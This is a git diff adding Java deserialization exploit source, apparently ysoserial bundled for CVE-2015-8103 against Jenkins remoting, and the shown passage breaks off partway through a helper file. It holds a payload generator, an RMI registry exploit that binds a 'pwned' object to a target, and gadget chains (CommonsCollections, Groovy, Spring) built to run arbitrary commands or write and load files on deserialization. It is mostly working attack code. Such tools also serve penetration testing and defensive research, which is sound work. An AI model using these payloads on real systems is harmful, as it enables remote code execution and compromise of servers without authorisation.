parent
1e336802c6
commit
eb4611642d
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1 @@
|
|||
<===[JENKINS REMOTING CAPACITY]===>
|
|
@ -0,0 +1,18 @@
|
|||
package ysoserial;
|
||||
|
||||
import java.io.File;
|
||||
import java.io.FileInputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
|
||||
import ysoserial.payloads.util.Serializables;
|
||||
|
||||
/*
|
||||
* for testing payloads across process boundaries
|
||||
*/
|
||||
public class Deserialize {
|
||||
public static void main(final String[] args) throws ClassNotFoundException, IOException {
|
||||
final InputStream in = args.length == 0 ? System.in : new FileInputStream(new File(args[0]));
|
||||
Serializables.deserialize(in);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,44 @@
|
|||
package ysoserial;
|
||||
|
||||
import java.security.Permission;
|
||||
import java.util.concurrent.Callable;
|
||||
|
||||
public class ExecBlockingSecurityManager extends SecurityManager {
|
||||
@Override
|
||||
public void checkPermission(final Permission perm) { }
|
||||
|
||||
@Override
|
||||
public void checkPermission(final Permission perm, final Object context) { }
|
||||
|
||||
public void checkExec(final String cmd) {
|
||||
super.checkExec(cmd);
|
||||
// throw a special exception to ensure we can detect exec() in the test
|
||||
throw new ExecException(cmd);
|
||||
};
|
||||
|
||||
@SuppressWarnings("serial")
|
||||
public static class ExecException extends RuntimeException {
|
||||
private final String cmd;
|
||||
public ExecException(String cmd) { this.cmd = cmd; }
|
||||
public String getCmd() { return cmd; }
|
||||
}
|
||||
|
||||
public static void wrap(final Runnable runnable) throws Exception {
|
||||
wrap(new Callable<Void>(){
|
||||
public Void call() throws Exception {
|
||||
runnable.run();
|
||||
return null;
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
public static <T> T wrap(final Callable<T> callable) throws Exception {
|
||||
SecurityManager sm = System.getSecurityManager();
|
||||
System.setSecurityManager(new ExecBlockingSecurityManager());
|
||||
try {
|
||||
return callable.call();
|
||||
} finally {
|
||||
System.setSecurityManager(sm);
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,86 @@
|
|||
package ysoserial;
|
||||
|
||||
import java.io.ObjectOutputStream;
|
||||
import java.util.ArrayList;
|
||||
import java.util.Collection;
|
||||
import java.util.Collections;
|
||||
import java.util.Comparator;
|
||||
import java.util.List;
|
||||
import java.util.Set;
|
||||
|
||||
import org.reflections.Reflections;
|
||||
|
||||
import ysoserial.payloads.ObjectPayload;
|
||||
|
||||
@SuppressWarnings("rawtypes")
|
||||
public class GeneratePayload {
|
||||
|
||||
private static final int INTERNAL_ERROR_CODE = 70;
|
||||
private static final int USAGE_CODE = 64;
|
||||
|
||||
public static void main(final String[] args) {
|
||||
if (args.length != 2) {
|
||||
printUsage();
|
||||
System.exit(USAGE_CODE);
|
||||
}
|
||||
final String payloadType = args[0];
|
||||
final String command = args[1];
|
||||
|
||||
final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
|
||||
if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
|
||||
System.err.println("Invalid payload type '" + payloadType + "'");
|
||||
printUsage();
|
||||
System.exit(USAGE_CODE);
|
||||
}
|
||||
|
||||
try {
|
||||
final ObjectPayload payload = payloadClass.newInstance();
|
||||
final Object object = payload.getObject(command);
|
||||
final ObjectOutputStream objOut = new ObjectOutputStream(System.out);
|
||||
objOut.writeObject(object);
|
||||
} catch (Throwable e) {
|
||||
System.err.println("Error while generating or serializing payload");
|
||||
e.printStackTrace();
|
||||
System.exit(INTERNAL_ERROR_CODE);
|
||||
}
|
||||
System.exit(0);
|
||||
}
|
||||
|
||||
@SuppressWarnings("unchecked")
|
||||
private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
|
||||
try {
|
||||
return (Class<? extends ObjectPayload>) Class.forName(className);
|
||||
} catch (Exception e1) {
|
||||
}
|
||||
try {
|
||||
return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName()
|
||||
+ ".payloads." + className);
|
||||
} catch (Exception e2) {
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
private static void printUsage() {
|
||||
System.err.println("Y SO SERIAL?");
|
||||
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
|
||||
System.err.println("\tAvailable payload types:");
|
||||
final List<Class<? extends ObjectPayload>> payloadClasses =
|
||||
new ArrayList<Class<? extends ObjectPayload>>(getPayloadClasses());
|
||||
Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
|
||||
for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
|
||||
System.err.println("\t\t" + payloadClass.getSimpleName());
|
||||
}
|
||||
}
|
||||
|
||||
// get payload classes by classpath scanning
|
||||
private static Collection<Class<? extends ObjectPayload>> getPayloadClasses() {
|
||||
final Reflections reflections = new Reflections(GeneratePayload.class.getPackage().getName());
|
||||
final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);
|
||||
return payloadTypes;
|
||||
}
|
||||
|
||||
public static class ToStringComparator implements Comparator<Object> {
|
||||
public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,53 @@
|
|||
package ysoserial;
|
||||
|
||||
import java.rmi.Remote;
|
||||
import java.rmi.registry.LocateRegistry;
|
||||
import java.rmi.registry.Registry;
|
||||
import java.util.Arrays;
|
||||
import java.util.concurrent.Callable;
|
||||
|
||||
import ysoserial.payloads.CommonsCollections1;
|
||||
import ysoserial.payloads.ObjectPayload;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
|
||||
/*
|
||||
* Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
|
||||
* Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
|
||||
*
|
||||
* TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
|
||||
* interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
|
||||
*/
|
||||
public class RMIRegistryExploit {
|
||||
public static void main(final String[] args) throws Exception {
|
||||
// ensure payload doesn't detonate during construction or deserialization
|
||||
ExecBlockingSecurityManager.wrap(new Callable<Void>(){public Void call() throws Exception {
|
||||
Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));
|
||||
String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
|
||||
Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
|
||||
Object payload = payloadClass.newInstance().getObject(args[3]);
|
||||
Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
|
||||
try {
|
||||
registry.bind("pwned", remote);
|
||||
} catch (Throwable e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
try {
|
||||
String[] names = registry.list();
|
||||
for (String name : names) {
|
||||
System.out.println("looking up '" + name + "'");
|
||||
try {
|
||||
Remote rem = registry.lookup(name);
|
||||
System.out.println(Arrays.asList(rem.getClass().getInterfaces()));
|
||||
} catch (Throwable e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
} catch (Throwable e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
return null;
|
||||
}});
|
||||
}
|
||||
}
|
|
@ -0,0 +1,70 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
import java.lang.reflect.InvocationHandler;
|
||||
import java.net.URL;
|
||||
import java.net.URLClassLoader;
|
||||
import java.util.HashMap;
|
||||
import java.util.Map;
|
||||
|
||||
import org.apache.commons.collections.Transformer;
|
||||
import org.apache.commons.collections.functors.ChainedTransformer;
|
||||
import org.apache.commons.collections.functors.ConstantTransformer;
|
||||
import org.apache.commons.collections.functors.InvokerTransformer;
|
||||
import org.apache.commons.collections.map.LazyMap;
|
||||
|
||||
import ysoserial.payloads.annotation.Dependencies;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
import ysoserial.payloads.util.PayloadRunner;
|
||||
import ysoserial.payloads.util.Reflections;
|
||||
|
||||
/*
|
||||
Requires:
|
||||
commons-collections
|
||||
*/
|
||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||
public class ClassLoaderInvoker extends PayloadRunner implements ObjectPayload<InvocationHandler> {
|
||||
|
||||
public InvocationHandler getObject(final String command) throws Exception {
|
||||
final String fileName = command.split(" ")[0];
|
||||
final String clazzName = command.split(" ")[1];
|
||||
final URL[] urlArray = new URL[]{ new URL("file://" + fileName)};
|
||||
// inert chain for setup
|
||||
final Transformer transformerChain = new ChainedTransformer(
|
||||
new Transformer[]{ new ConstantTransformer(1) });
|
||||
// real chain for after setup
|
||||
final Transformer[] transformers = new Transformer[] {
|
||||
new ConstantTransformer(URLClassLoader.class),
|
||||
new InvokerTransformer("getMethod", new Class[] {
|
||||
String.class, Class[].class }, new Object[] {
|
||||
"newInstance", new Class[]{ URL[].class }}),
|
||||
new InvokerTransformer("invoke", new Class[] {
|
||||
Object.class, Object[].class }, new Object[] {
|
||||
null, new Object[]{ urlArray } }),
|
||||
new InvokerTransformer("loadClass", new Class[] {
|
||||
String.class}, new Object[] { clazzName }),
|
||||
new InvokerTransformer("getMethod", new Class[] {
|
||||
String.class, Class[].class }, new Object[] {
|
||||
"main", new Class[]{String[].class} }),
|
||||
new InvokerTransformer("invoke", new Class[] {
|
||||
Object.class, Object[].class }, new Object[] {
|
||||
null, new Object[]{ new String[]{} } }),
|
||||
new ConstantTransformer(1) };
|
||||
|
||||
final Map innerMap = new HashMap();
|
||||
|
||||
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
||||
|
||||
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
|
||||
|
||||
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
|
||||
|
||||
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
|
||||
|
||||
return handler;
|
||||
}
|
||||
|
||||
public static void main(final String[] args) throws Exception {
|
||||
PayloadRunner.run(ClassLoaderInvoker.class, args);
|
||||
}
|
||||
}
|
78
external/source/exploits/CVE-2015-8103/payloads/CommonsCollections1.java
vendored
Executable file
78
external/source/exploits/CVE-2015-8103/payloads/CommonsCollections1.java
vendored
Executable file
|
@ -0,0 +1,78 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
import java.lang.reflect.InvocationHandler;
|
||||
import java.util.HashMap;
|
||||
import java.util.Map;
|
||||
|
||||
import org.apache.commons.collections.Transformer;
|
||||
import org.apache.commons.collections.functors.ChainedTransformer;
|
||||
import org.apache.commons.collections.functors.ConstantTransformer;
|
||||
import org.apache.commons.collections.functors.InvokerTransformer;
|
||||
import org.apache.commons.collections.map.LazyMap;
|
||||
|
||||
import ysoserial.payloads.annotation.Dependencies;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
import ysoserial.payloads.util.PayloadRunner;
|
||||
import ysoserial.payloads.util.Reflections;
|
||||
|
||||
/*
|
||||
Gadget chain:
|
||||
ObjectInputStream.readObject()
|
||||
AnnotationInvocationHandler.readObject()
|
||||
Map(Proxy).entrySet()
|
||||
AnnotationInvocationHandler.invoke()
|
||||
LazyMap.get()
|
||||
ChainedTransformer.transform()
|
||||
ConstantTransformer.transform()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Class.getMethod()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Runtime.getRuntime()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Runtime.exec()
|
||||
|
||||
Requires:
|
||||
commons-collections
|
||||
*/
|
||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||
public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
|
||||
|
||||
public InvocationHandler getObject(final String command) throws Exception {
|
||||
final String[] execArgs = new String[] { command };
|
||||
// inert chain for setup
|
||||
final Transformer transformerChain = new ChainedTransformer(
|
||||
new Transformer[]{ new ConstantTransformer(1) });
|
||||
// real chain for after setup
|
||||
final Transformer[] transformers = new Transformer[] {
|
||||
new ConstantTransformer(Runtime.class),
|
||||
new InvokerTransformer("getMethod", new Class[] {
|
||||
String.class, Class[].class }, new Object[] {
|
||||
"getRuntime", new Class[0] }),
|
||||
new InvokerTransformer("invoke", new Class[] {
|
||||
Object.class, Object[].class }, new Object[] {
|
||||
null, new Object[0] }),
|
||||
new InvokerTransformer("exec",
|
||||
new Class[] { String.class }, execArgs),
|
||||
new ConstantTransformer(1) };
|
||||
|
||||
final Map innerMap = new HashMap();
|
||||
|
||||
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
||||
|
||||
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
|
||||
|
||||
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
|
||||
|
||||
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
|
||||
|
||||
return handler;
|
||||
}
|
||||
|
||||
public static void main(final String[] args) throws Exception {
|
||||
PayloadRunner.run(CommonsCollections1.class, args);
|
||||
}
|
||||
}
|
57
external/source/exploits/CVE-2015-8103/payloads/CommonsCollections2.java
vendored
Executable file
57
external/source/exploits/CVE-2015-8103/payloads/CommonsCollections2.java
vendored
Executable file
|
@ -0,0 +1,57 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
import java.util.PriorityQueue;
|
||||
import java.util.Queue;
|
||||
|
||||
import org.apache.commons.collections4.comparators.TransformingComparator;
|
||||
import org.apache.commons.collections4.functors.InvokerTransformer;
|
||||
|
||||
import ysoserial.payloads.annotation.Dependencies;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
import ysoserial.payloads.util.PayloadRunner;
|
||||
import ysoserial.payloads.util.Reflections;
|
||||
|
||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
|
||||
|
||||
/*
|
||||
Gadget chain:
|
||||
ObjectInputStream.readObject()
|
||||
PriorityQueue.readObject()
|
||||
...
|
||||
TransformingComparator.compare()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Runtime.exec()
|
||||
*/
|
||||
|
||||
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
|
||||
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
||||
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {
|
||||
|
||||
public Queue<Object> getObject(final String command) throws Exception {
|
||||
final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
|
||||
// mock method name until armed
|
||||
final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
||||
|
||||
// create queue with numbers and basic comparator
|
||||
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
|
||||
// stub data for replacement later
|
||||
queue.add(1);
|
||||
queue.add(1);
|
||||
|
||||
// switch method called by comparator
|
||||
Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
|
||||
|
||||
// switch contents of queue
|
||||
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
|
||||
queueArray[0] = templates;
|
||||
queueArray[1] = 1;
|
||||
|
||||
return queue;
|
||||
}
|
||||
|
||||
public static void main(final String[] args) throws Exception {
|
||||
PayloadRunner.run(CommonsCollections2.class, args);
|
||||
}
|
||||
|
||||
}
|
81
external/source/exploits/CVE-2015-8103/payloads/CommonsCollections3.java
vendored
Executable file
81
external/source/exploits/CVE-2015-8103/payloads/CommonsCollections3.java
vendored
Executable file
|
@ -0,0 +1,81 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
import java.io.File;
|
||||
import java.io.FileInputStream;
|
||||
import java.lang.reflect.InvocationHandler;
|
||||
import java.util.HashMap;
|
||||
import java.util.Map;
|
||||
|
||||
import org.apache.commons.collections.Transformer;
|
||||
import org.apache.commons.collections.functors.ChainedTransformer;
|
||||
import org.apache.commons.collections.functors.ConstantTransformer;
|
||||
import org.apache.commons.collections.functors.InvokerTransformer;
|
||||
import org.apache.commons.collections.map.LazyMap;
|
||||
import org.apache.commons.io.FileUtils;
|
||||
|
||||
import ysoserial.payloads.annotation.Dependencies;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
import ysoserial.payloads.util.PayloadRunner;
|
||||
import ysoserial.payloads.util.Reflections;
|
||||
|
||||
/*
|
||||
Gadget chain:
|
||||
ObjectInputStream.readObject()
|
||||
AnnotationInvocationHandler.readObject()
|
||||
Map(Proxy).entrySet()
|
||||
AnnotationInvocationHandler.invoke()
|
||||
LazyMap.get()
|
||||
ChainedTransformer.transform()
|
||||
ConstantTransformer.transform()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Class.getMethod()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Runtime.getRuntime()
|
||||
InvokerTransformer.transform()
|
||||
Method.invoke()
|
||||
Runtime.exec()
|
||||
|
||||
Requires:
|
||||
commons-collections
|
||||
*/
|
||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||
public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
|
||||
|
||||
public InvocationHandler getObject(final String command) throws Exception {
|
||||
final File f = new File("/tmp/ysocereal.jar");
|
||||
final byte[] bFile = FileUtils.readFileToByteArray(new File("/tmp/pwned.jar"));
|
||||
|
||||
// inert chain for setup
|
||||
final Transformer transformerChain = new ChainedTransformer(
|
||||
new Transformer[]{ new ConstantTransformer(1) });
|
||||
// real chain for after setup
|
||||
final Transformer[] transformers = new Transformer[] {
|
||||
new ConstantTransformer(FileUtils.class),
|
||||
new InvokerTransformer("getMethod", new Class[] {
|
||||
String.class, Class[].class }, new Object[] {
|
||||
"writeByteArrayToFile", new Class[]{File.class, byte[].class} }),
|
||||
new InvokerTransformer("invoke", new Class[] {
|
||||
Object.class, Object[].class }, new Object[] {
|
||||
null, new Object[]{f,bFile} }),
|
||||
new ConstantTransformer(1) };
|
||||
|
||||
final Map innerMap = new HashMap();
|
||||
|
||||
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
||||
|
||||
final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
|
||||
|
||||
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
|
||||
|
||||
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
|
||||
|
||||
return handler;
|
||||
}
|
||||
|
||||
public static void main(final String[] args) throws Exception {
|
||||
PayloadRunner.run(CommonsCollections3.class, args);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,45 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
import java.lang.reflect.InvocationHandler;
|
||||
import java.util.Map;
|
||||
|
||||
import org.codehaus.groovy.runtime.ConvertedClosure;
|
||||
import org.codehaus.groovy.runtime.MethodClosure;
|
||||
|
||||
import ysoserial.payloads.annotation.Dependencies;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
import ysoserial.payloads.util.PayloadRunner;
|
||||
|
||||
/*
|
||||
Gadget chain:
|
||||
ObjectInputStream.readObject()
|
||||
PriorityQueue.readObject()
|
||||
Comparator.compare() (Proxy)
|
||||
ConvertedClosure.invoke()
|
||||
MethodClosure.call()
|
||||
...
|
||||
Method.invoke()
|
||||
Runtime.exec()
|
||||
|
||||
Requires:
|
||||
groovy
|
||||
*/
|
||||
|
||||
@SuppressWarnings({ "rawtypes", "unchecked" })
|
||||
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
|
||||
public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
|
||||
|
||||
public InvocationHandler getObject(final String command) throws Exception {
|
||||
final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
|
||||
|
||||
final Map map = Gadgets.createProxy(closure, Map.class);
|
||||
|
||||
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
|
||||
|
||||
return handler;
|
||||
}
|
||||
|
||||
public static void main(final String[] args) throws Exception {
|
||||
PayloadRunner.run(Groovy1.class, args);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,9 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
public interface ObjectPayload<T> {
|
||||
/*
|
||||
* return armed payload object to be serialized that will execute specified
|
||||
* command on deserialization
|
||||
*/
|
||||
public T getObject(String command) throws Exception;
|
||||
}
|
|
@ -0,0 +1,78 @@
|
|||
package ysoserial.payloads;
|
||||
|
||||
import static java.lang.Class.forName;
|
||||
|
||||
import java.lang.reflect.Constructor;
|
||||
import java.lang.reflect.InvocationHandler;
|
||||
import java.lang.reflect.Type;
|
||||
|
||||
import javax.xml.transform.Templates;
|
||||
|
||||
import org.springframework.beans.factory.ObjectFactory;
|
||||
|
||||
import ysoserial.payloads.annotation.Dependencies;
|
||||
import ysoserial.payloads.util.Gadgets;
|
||||
import ysoserial.payloads.util.PayloadRunner;
|
||||
import ysoserial.payloads.util.Reflections;
|
||||
|
||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
|
||||
|
||||
/*
|
||||
Gadget chain:
|
||||
|
||||
ObjectInputStream.readObject()
|
||||
SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
|
||||
SerializableTypeWrapper.TypeProvider(Proxy).getType()
|
||||
AnnotationInvocationHandler.invoke()
|
||||
HashMap.get()
|
||||
ReflectionUtils.findMethod()
|
||||
SerializableTypeWrapper.TypeProvider(Proxy).getType()
|
||||
AnnotationInvocationHandler.invoke()
|
||||
HashMap.get()
|
||||
ReflectionUtils.invokeMethod()
|
||||
Method.invoke()
|
||||
Templates(Proxy).newTransformer()
|
||||
AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
|
||||
ObjectFactory(Proxy).getObject()
|
||||
AnnotationInvocationHandler.invoke()
|
||||
HashMap.get()
|
||||
Method.invoke()
|
||||
TemplatesImpl.newTransformer()
|
||||
TemplatesImpl.getTransletInstance()
|
||||
TemplatesImpl.defineTransletClasses()
|
||||
TemplatesImpl.TransletClassLoader.defineClass()
|
||||
Pwner*(Javassist-generated).<static init>
|
||||
Runtime.exec()
|
||||
|
||||
*/
|
||||
|
||||
@SuppressWarnings({"restriction", "rawtypes"})
|
||||
@Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
|
||||
public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {
|
||||
|
||||
public Object getObject(final String command) throws Exception {
|
||||
final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
|
||||
|
||||
final ObjectFactory objectFactoryProxy =
|
||||
Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
|
||||
|
||||
final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler)
|
||||
Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
|
||||
.newInstance(objectFactoryProxy), Type.class, Templates.class);
|
||||
|
||||
final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
|
||||
Gadgets.createMap("getType", typeTemplatesProxy),
|
||||
forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
|
||||
|
||||
final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
|
||||
final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
|
||||
Reflections.setFieldValue(mitp, "methodName", "newTransformer");
|
||||
|
||||
return mitp;
|
||||
}
|
||||
|
||||
public static void main(final String[] args) throws Exception {
|
||||
PayloadRunner.run(Spring1.class, args);
|
||||
}
|
||||
|
||||
}
|
12
external/source/exploits/CVE-2015-8103/payloads/annotation/Dependencies.java
vendored
Executable file
12
external/source/exploits/CVE-2015-8103/payloads/annotation/Dependencies.java
vendored
Executable file
|
@ -0,0 +1,12 @@
|
|||
package ysoserial.payloads.annotation;
|
||||
|
||||
import java.lang.annotation.ElementType;
|
||||
import java.lang.annotation.Retention;
|
||||
import java.lang.annotation.RetentionPolicy;
|
||||
import java.lang.annotation.Target;
|
||||
|
||||
@Target(ElementType.TYPE)
|
||||
@Retention(RetentionPolicy.RUNTIME)
|
||||
public @interface Dependencies {
|
||||
String[] value() default {};
|
||||
}
|
|
@ -0,0 +1,44 @@
|
|||
package ysoserial.payloads.util;
|
||||
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
|
||||
public class ClassFiles {
|
||||
public static String classAsFile(final Class<?> clazz) {
|
||||
return classAsFile(clazz, true);
|
||||
}
|
||||
|
||||
public static String classAsFile(final Class<?> clazz, boolean suffix) {
|
||||
String str;
|
||||
if (clazz.getEnclosingClass() == null) {
|
||||
str = clazz.getName().replace(".", "/");
|
||||
} else {
|
||||
str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
|
||||
}
|
||||
if (suffix) {
|
||||
str += ".class";
|
||||
}
|
||||
return str;
|
||||
}
|
||||
|
||||
public static byte[] classAsBytes(final Class<?> clazz) {
|
||||
try {
|
||||
final byte[] buffer = new byte[1024];
|
||||
final String file = classAsFile(clazz);
|
||||
final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
|
||||
if (in == null) {
|
||||
throw new IOException("couldn't find '" + file + "'");
|
||||
}
|
||||
final ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
int len;
|
||||
while ((len = in.read(buffer)) != -1) {
|
||||
out.write(buffer, 0, len);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} catch (IOException e) {
|
||||
throw new RuntimeException(e);
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,92 @@
|
|||
package ysoserial.payloads.util;
|
||||
|
||||
import java.io.Serializable;
|
||||
import java.lang.reflect.Array;
|
||||
import java.lang.reflect.InvocationHandler;
|
||||
import java.lang.reflect.Proxy;
|
||||
import java.util.HashMap;
|
||||
import java.util.Map;
|
||||
|
||||
import javassist.ClassClassPath;
|
||||
import javassist.ClassPool;
|
||||
import javassist.CtClass;
|
||||
|
||||
import com.sun.org.apache.xalan.internal.xsltc.DOM;
|
||||
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
|
||||
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
|
||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
|
||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
|
||||
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
|
||||
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
|
||||
|
||||
/*
|
||||
* utility generator functions for common jdk-only gadgets
|
||||
*/
|
||||
@SuppressWarnings("restriction")
|
||||
public class Gadgets {
|
||||
private static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
|
||||
|
||||
public static class StubTransletPayload extends AbstractTranslet implements Serializable {
|
||||
private static final long serialVersionUID = -5971610431559700674L;
|
||||
|
||||
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
|
||||
|
||||
@Override
|
||||
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
|
||||
}
|
||||
|
||||
// required to make TemplatesImpl happy
|
||||
public static class Foo implements Serializable {
|
||||
private static final long serialVersionUID = 8207363842866235160L;
|
||||
}
|
||||
|
||||
public static <T> T createMemoitizedProxy(final Map<String,Object> map, final Class<T> iface,
|
||||
final Class<?> ... ifaces) throws Exception {
|
||||
return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);
|
||||
}
|
||||
|
||||
public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {
|
||||
return (InvocationHandler) Reflections.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
|
||||
}
|
||||
|
||||
public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?> ... ifaces) {
|
||||
final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
|
||||
allIfaces[0] = iface;
|
||||
if (ifaces.length > 0) {
|
||||
System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);
|
||||
}
|
||||
return iface.cast(Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces , ih));
|
||||
}
|
||||
|
||||
public static Map<String,Object> createMap(final String key, final Object val) {
|
||||
final Map<String,Object> map = new HashMap<String, Object>();
|
||||
map.put(key,val);
|
||||
return map;
|
||||
}
|
||||
|
||||
public static TemplatesImpl createTemplatesImpl(final String command) throws Exception {
|
||||
final TemplatesImpl templates = new TemplatesImpl();
|
||||
|
||||
// use template gadget class
|
||||
ClassPool pool = ClassPool.getDefault();
|
||||
pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
|
||||
final CtClass clazz = pool.get(StubTransletPayload.class.getName());
|
||||
// run command in static initializer
|
||||
// TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
|
||||
clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");
|
||||
// sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
|
||||
clazz.setName("ysoserial.Pwner" + System.nanoTime());
|
||||
|
||||
final byte[] classBytes = clazz.toBytecode();
|
||||
|
||||
// inject class bytes into instance
|
||||
